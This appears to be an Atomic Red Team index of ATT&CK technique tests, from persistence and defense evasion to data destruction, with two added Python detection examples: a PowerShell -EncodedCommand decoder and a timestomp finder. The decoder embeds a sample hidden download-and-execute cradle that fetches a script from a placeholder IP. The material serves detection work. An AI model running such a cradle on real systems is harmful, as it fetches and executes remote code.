- T1156 .bash_profile and .bashrc
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1015 Accessibility Features
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
- Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
- Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
- Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
- Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
- Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
- T1098 Account Manipulation
- Atomic Test #1: Admin Account Manipulate [windows]
- T1182 AppCert DLLs CONTRIBUTE A TEST
- T1103 AppInit DLLs
- Atomic Test #1: Install AppInit Shim [windows]
- T1138 Application Shimming
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- T1131 Authentication Package CONTRIBUTE A TEST
- T1197 BITS Jobs
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- T1067 Bootkit CONTRIBUTE A TEST
- T1176 Browser Extensions
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1042 Change Default File Association
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware CONTRIBUTE A TEST
- T1122 Component Object Model Hijacking
- Atomic Test #1: Component Object Model Hijacking [windows]
- T1136 Create Account
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with root UID and GID [linux]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking CONTRIBUTE A TEST
- T1519 Emond
- Atomic Test #1: Persistence with Event Monitor - emond [macos]
- T1133 External Remote Services CONTRIBUTE A TEST
- T1044 File System Permissions Weakness
- Atomic Test #1: File System Permissions Weakness [windows]
- T1158 Hidden Files and Directories
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Create ADS command prompt [windows]
- Atomic Test #9: Create ADS PowerShell [windows]
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1062 Hypervisor
- Atomic Test #1: Installing Hyper-V Feature [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1525 Implant Container Image CONTRIBUTE A TEST
- T1215 Kernel Modules and Extensions
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1161 LC_LOAD_DYLIB Addition CONTRIBUTE A TEST
- T1177 LSASS Driver CONTRIBUTE A TEST
- T1159 Launch Agent
- Atomic Test #1: Launch Agent [macos]
- T1160 Launch Daemon
- Atomic Test #1: Launch Daemon [macos]
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1168 Local Job Scheduling
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, linux]
- T1162 Login Item CONTRIBUTE A TEST
- T1037 Logon Scripts
- Atomic Test #1: Logon Scripts [windows]
- Atomic Test #2: Startup Folder Script [windows]
- Atomic Test #3: Scheduled Task Startup Script [windows]
- Atomic Test #4: Logon Scripts - Mac [macos]
- T1031 Modify Existing Service
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- T1128 Netsh Helper DLL
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1050 New Service
- Atomic Test #1: Service Installation [windows]
- Atomic Test #2: Service Installation PowerShell (installs a local service using PowerShell) [windows]
- T1137 Office Application Startup
- Atomic Test #1: DDEAUTO [windows]
- T1034 Path Interception CONTRIBUTE A TEST
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1205 Port Knocking CONTRIBUTE A TEST
- T1013 Port Monitors CONTRIBUTE A TEST
- T1504 PowerShell Profile
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1163 Rc.common
- Atomic Test #1: rc.common [macos]
- T1164 Re-opened Applications
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access CONTRIBUTE A TEST
- T1060 Registry Run Keys / Startup Folder
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- T1198 SIP and Trust Provider Hijacking CONTRIBUTE A TEST
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1180 Screensaver
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1058 Service Registry Permissions Weakness
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- T1166 Setuid and Setgid
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1023 Shortcut Modification
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1165 Startup Items
- Atomic Test #1: add file to Local Library StartupItems [macos]
- T1019 System Firmware CONTRIBUTE A TEST
- T1501 Systemd Service
- Atomic Test #1: Create Systemd Service [linux]
- T1209 Time Providers CONTRIBUTE A TEST
- T1154 Trap
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1100 Web Shell
- Atomic Test #1: Web Shell Written to Disk [windows]
- T1084 Windows Management Instrumentation Event Subscription
- Atomic Test #1: Persistence [windows]
- T1004 Winlogon Helper DLL
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1134 Access Token Manipulation
- Atomic Test #1: Access Token Manipulation [windows]
- T1527 Application Access Token CONTRIBUTE A TEST
- T1197 BITS Jobs
- Atomic Test #1: Download & Execute [windows]
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- T1009 Binary Padding
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1088 Bypass User Account Control
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults - PowerShell [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- T1191 CMSTP
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1146 Clear Command History
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- T1116 Code Signing CONTRIBUTE A TEST
- T1500 Compile After Delivery
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- T1223 Compiled HTML File
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware CONTRIBUTE A TEST
- T1122 Component Object Model Hijacking
- Atomic Test #1: Component Object Model Hijacking [windows]
- T1090 Connection Proxy
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
- T1196 Control Panel Items
- Atomic Test #1: Control Panel Items [windows]
- T1207 DCShadow
- Atomic Test #1: DCShadow - Mimikatz [windows]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1073 DLL Side-Loading
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- T1140 Deobfuscate/Decode Files or Information
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- T1089 Disabling Security Tools
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable syslog [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Unload Sysmon Filter Driver [windows]
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails CONTRIBUTE A TEST
- T1211 Exploitation for Defense Evasion CONTRIBUTE A TEST
- T1181 Extra Window Memory Injection CONTRIBUTE A TEST
- T1107 File Deletion
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete VSS - vssadmin [windows]
- Atomic Test #9: Delete VSS - wmic [windows]
- Atomic Test #10: bcdedit [windows]
- Atomic Test #11: wbadmin [windows]
- Atomic Test #12: Delete Filesystem - Linux [linux]
- Atomic Test #13: Delete-PrefetchFile [windows]
- T1006 File System Logical Offsets
- Atomic Test #1: File System Logical Offsets using PowerShell [windows]
- T1222 File and Directory Permissions Modification
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: Take ownership recursively using takeown utility [windows]
- Atomic Test #3: cacls - Grant permission to specified user or group [windows]
- Atomic Test #4: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #5: icacls - Grant permission to specified user or group [windows]
- Atomic Test #6: icacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #7: attrib - Remove read-only attribute [windows]
- Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #10: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #11: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #12: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #13: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #14: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #15: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #16: chattr - Remove immutable file attribute [macos, linux]
- T1144 Gatekeeper Bypass
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484 Group Policy Modification CONTRIBUTE A TEST
- T1148 HISTCONTROL
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1158 Hidden Files and Directories
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Create ADS command prompt [windows]
- Atomic Test #9: Create ADS PowerShell [windows]
- T1147 Hidden Users
- Atomic Test #1: Hidden Users [macos]
- T1143 Hidden Window
- Atomic Test #1: Hidden Window [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1054 Indicator Blocking CONTRIBUTE A TEST
- T1066 Indicator Removal from Tools CONTRIBUTE A TEST
- T1070 Indicator Removal on Host
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: FSUtil [windows]
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- Atomic Test #6: Delete System Logs Using PowerShell [windows]
- Atomic Test #7: Delete System Logs Using Clear-EventLogId [windows]
- T1202 Indirect Command Execution
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- T1130 Install Root Certificate
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- T1118 InstallUtil
- Atomic Test #1: InstallUtil uninstall method call [windows]
- Atomic Test #2: InstallUtil GetHelp method call [windows]
- T1149 LC_MAIN Hijacking CONTRIBUTE A TEST
- T1152 Launchctl
- Atomic Test #1: Launchctl [macos]
- T1036 Masquerading
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- T1112 Modify Registry
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry to store logon credentials [windows]
- Atomic Test #5: Modify registry to store PowerShell code [windows]
- Atomic Test #6: Add domain to Trusted sites Zone [windows]
- T1170 Mshta
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
- Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
- T1096 NTFS File Attributes
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- T1126 Network Share Connection Removal
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- T1027 Obfuscated Files or Information
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
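The two Windows tests above run a script passed through powershell.exe's -EncodedCommand switch, which takes the script as base64 of its UTF-16LE bytes. A detector that greps for the literal string "-EncodedCommand" misses most real usage, because powershell.exe also accepts any unambiguous prefix of the switch (-e, -en, -enc, -encoded) and the explicit -ec alias. The helper below is an added example, not part of Atomic Red Team; the command line and script it decodes are constructed here for illustration (the 203.0.113.10 address is documentation space), and whitespace splitting of the command line is a simplification that is good enough because base64 contains no spaces.

```python
"""Added example: recover the script hidden behind powershell.exe -EncodedCommand.

Not Atomic Red Team code. The sample command line below is constructed for the
example; a real detector would feed it process-creation events (Sysmon EID 1,
Security 4688 with command-line auditing).
"""
import base64
import re

# A switch token: "-" or "/" followed by letters only (so "-w", "-nop", "-ep").
_SWITCH = re.compile(r"^[-/](?P<name>[A-Za-z]+)$")


def is_encoded_command_switch(token: str) -> bool:
    """True for -EncodedCommand and every abbreviation powershell.exe accepts.

    powershell.exe resolves unambiguous prefixes, so "-e", "-en", "-enc",
    "-encoded" all mean -EncodedCommand; "-ec" is a documented alias.
    "-ep" (ExecutionPolicy) and "-ex" are NOT prefixes of "encodedcommand"
    and are correctly rejected.
    """
    m = _SWITCH.match(token)
    if not m:
        return False
    name = m.group("name").lower()
    return name == "ec" or "encodedcommand".startswith(name)


def encode_powershell_command(script: str) -> str:
    """What an attacker (or the atomic test) does: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded
    command, else None.  Malformed base64 or odd-length payloads (not valid
    UTF-16LE) also yield None rather than raising, so this is safe to run
    over untrusted log data.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not is_encoded_command_switch(tok):
            continue
        blob = tokens[i + 1].strip("\"'")
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


# Constructed sample (not from a real incident): a download-cradle one-liner
# wrapped the way commodity droppers usually launch it.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_CMDLINE = (
    "powershell.exe -nop -w hidden -ep bypass -enc "
    + encode_powershell_command(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    print("switch present :", any(is_encoded_command_switch(t) for t in SAMPLE_CMDLINE.split()))
    print("decoded script :", decode_encoded_command(SAMPLE_CMDLINE))
```

Decoding at collection time is what makes the downstream rules (look for IEX, DownloadString, -w hidden together) work; the encoded form defeats string matching on the raw command line, which is exactly why the technique is listed under Defense Evasion.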
- T1502 Parent PID Spoofing
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1205 Port Knocking CONTRIBUTE A TEST
- T1186 Process Doppelgänging CONTRIBUTE A TEST
- T1093 Process Hollowing
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- T1055 Process Injection
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #5: Process Injection via C# [windows]
- Atomic Test #6: svchost writing a file to a UNC path [windows]
- T1108 Redundant Access CONTRIBUTE A TEST
- T1121 Regsvcs/Regasm
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- T1117 Regsvr32
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- T1536 Revert Cloud Instance CONTRIBUTE A TEST
- T1014 Rootkit
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1085 Rundll32
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- T1198 SIP and Trust Provider Hijacking CONTRIBUTE A TEST
- T1064 Scripting
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Create and Execute Batch Script [windows]
- T1218 Signed Binary Proxy Execution
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
- Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- T1216 Signed Script Proxy Execution
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing CONTRIBUTE A TEST
- T1151 Space after Filename
- Atomic Test #1: Space After Filename [macos]
- T1221 Template Injection CONTRIBUTE A TEST
- T1099 Timestomp
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
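The Linux/macOS tests above set access and modification times with touch (including touch -r, which copies them from a reference file). What those tools cannot set is the inode change time, ctime: the kernel stamps ctime with the current clock on every metadata change, including the utime call that performs the timestomp. A file whose mtime sits well before its ctime is therefore either timestomped or has had some other metadata change since it was written (chmod, chown, rename, or an archive/rsync extraction that preserved mtime), which makes the check a useful triage heuristic but not proof. The script below is an added example, not an Atomic Red Team test; it creates its own sample files in a temporary directory, timestomps one of them the way the tests do, and then finds it. The one-hour threshold is an arbitrary choice. On Windows st_ctime is the creation time, not the change time, so the heuristic does not transfer there.

```python
"""Added example: finding timestomped files via the mtime/ctime gap.

Not Atomic Red Team code.  Linux/macOS only: on Windows os.stat().st_ctime is
the creation time and this check is meaningless.
"""
import os
import stat
import tempfile
import time


def timestomp(path: str, new_epoch: float) -> None:
    """Backdate atime and mtime, which is all `touch -t` / `touch -r` can do."""
    os.utime(path, (new_epoch, new_epoch))  # kernel sets ctime = now here


def mtime_ctime_gap(path: str) -> float:
    """Seconds by which ctime is later than mtime (about 0 for a fresh file)."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime


def find_suspicious(root: str, min_gap_seconds: float = 3600.0) -> list:
    """Walk `root` and return (path, gap) for regular files whose mtime is at
    least `min_gap_seconds` before ctime (backdated) or after it (set into
    the future; also impossible through normal writes)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)  # lstat: do not follow symlinks out of root
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            gap = st.st_ctime - st.st_mtime
            if abs(gap) >= min_gap_seconds:
                hits.append((p, gap))
    return hits


def demo() -> list:
    """Constructed scenario: two fresh files, one backdated a year; return the
    basenames the scanner flags (expected: only the stomped one)."""
    with tempfile.TemporaryDirectory() as d:
        clean = os.path.join(d, "clean.log")
        stomped = os.path.join(d, "stomped.log")
        for p in (clean, stomped):
            with open(p, "w") as f:
                f.write("constructed sample line\n")
        timestomp(stomped, time.time() - 365 * 86400)
        return sorted(os.path.basename(p) for p, _gap in find_suspicious(d))


if __name__ == "__main__":
    for name in demo():
        print("suspicious:", name)
```

Expect false positives from package installs and backups that preserve mtime; the point is to shortlist files for a closer look (compare against the filesystem journal or $MFT-equivalent data where available), not to alert on every hit.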
- T1127 Trusted Developer Utilities
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1535 Unused/Unsupported Cloud Regions CONTRIBUTE A TEST
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1497 Virtualization/Sandbox Evasion CONTRIBUTE A TEST
- T1102 Web Service
- Atomic Test #1: Reach out to C2 Pointer URLs via command_prompt [windows]
- Atomic Test #2: Reach out to C2 Pointer URLs via powershell [windows]
- T1506 Web Session Cookie CONTRIBUTE A TEST
- T1220 XSL Script Processing
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- T1134 Access Token Manipulation
- Atomic Test #1: Access Token Manipulation [windows]
- T1015 Accessibility Features
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
- Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
- Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
- Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
- Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
- Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
- T1182 AppCert DLLs CONTRIBUTE A TEST
- T1103 AppInit DLLs
- Atomic Test #1: Install AppInit Shim [windows]
- T1138 Application Shimming
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- T1088 Bypass User Account Control
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults - PowerShell [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- T1038 DLL Search Order Hijacking
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking CONTRIBUTE A TEST
- T1514 Elevated Execution with Prompt CONTRIBUTE A TEST
- T1519 Emond
- Atomic Test #1: Persistence with Event Monitor - emond [macos]
- T1068 Exploitation for Privilege Escalation CONTRIBUTE A TEST
- T1181 Extra Window Memory Injection CONTRIBUTE A TEST
- T1044 File System Permissions Weakness
- Atomic Test #1: File System Permissions Weakness [windows]
- T1179 Hooking
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1183 Image File Execution Options Injection
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1160 Launch Daemon
- Atomic Test #1: Launch Daemon [macos]
- T1050 New Service
- Atomic Test #1: Service Installation [windows]
- Atomic Test #2: Service Installation PowerShell (installs a local service using PowerShell) [windows]
- T1502 Parent PID Spoofing
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- T1034 Path Interception CONTRIBUTE A TEST
- T1150 Plist Modification
- Atomic Test #1: Plist Modification [macos]
- T1013 Port Monitors CONTRIBUTE A TEST
- T1504 PowerShell Profile
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1055 Process Injection
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #5: Process Injection via C# [windows]
- Atomic Test #6: svchost writing a file to a UNC path [windows]
- T1178 SID-History Injection CONTRIBUTE A TEST
- T1053 Scheduled Task
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1058 Service Registry Permissions Weakness
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- T1166 Setuid and Setgid
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1165 Startup Items
- Atomic Test #1: add file to Local Library StartupItems [macos]
- T1169 Sudo
- Atomic Test #1: Sudo usage [macos, linux]
- T1206 Sudo Caching
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts CONTRIBUTE A TEST
- T1100 Web Shell
- Atomic Test #1: Web Shell Written to Disk [windows]
- T1531 Account Access Removal
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- T1485 Data Destruction
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
